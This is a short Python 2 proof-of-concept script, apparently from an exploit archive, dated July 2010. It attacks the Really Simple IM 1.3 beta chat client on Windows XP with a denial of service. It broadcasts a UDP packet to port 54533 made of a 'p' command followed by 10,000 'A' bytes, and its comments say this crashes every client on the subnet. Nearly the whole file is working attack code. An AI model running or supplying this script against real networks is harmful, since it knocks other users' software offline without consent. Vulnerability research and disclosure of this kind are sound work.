import socket import sys
# Bug found: 18th July 2010 # DoS proof of concept # Found by: loneferret # Tested on Windows XP Professional SP2-SP3 & Windows XP Home SP3
# Really Simple IM verion 1.3 beta # Software: http://code.google.com/p/reallysimpleim/ # Nods to exploit-db # I don't want this on injector <- notice the no leet talk.
# This little application uses UDP to & send receive messages. # It broadcasts everything, and picks up everything # on port 54533. # The funny thing with this PoC, it will crash all clients # in the same subnet. Yup it's that funny. That's the only thing it does too... # No EIP, no SEH but the buffer is still in memory at the # moment of the crash. Figured I'd share anyway.
#Commands # 'p' Connect and adds users to list # 'a' Disconnect message # 'b' Send message # 't' Direct message
host = '192.168.xxx.255' #Adjust broadcast address to your network port = 54533
try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.bind((host,0)) s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) except: print "socket() failed" sys.exit(1)
da = "p" da += "W00T" + ("\x41" * 10000) s.sendto(da, (host, port))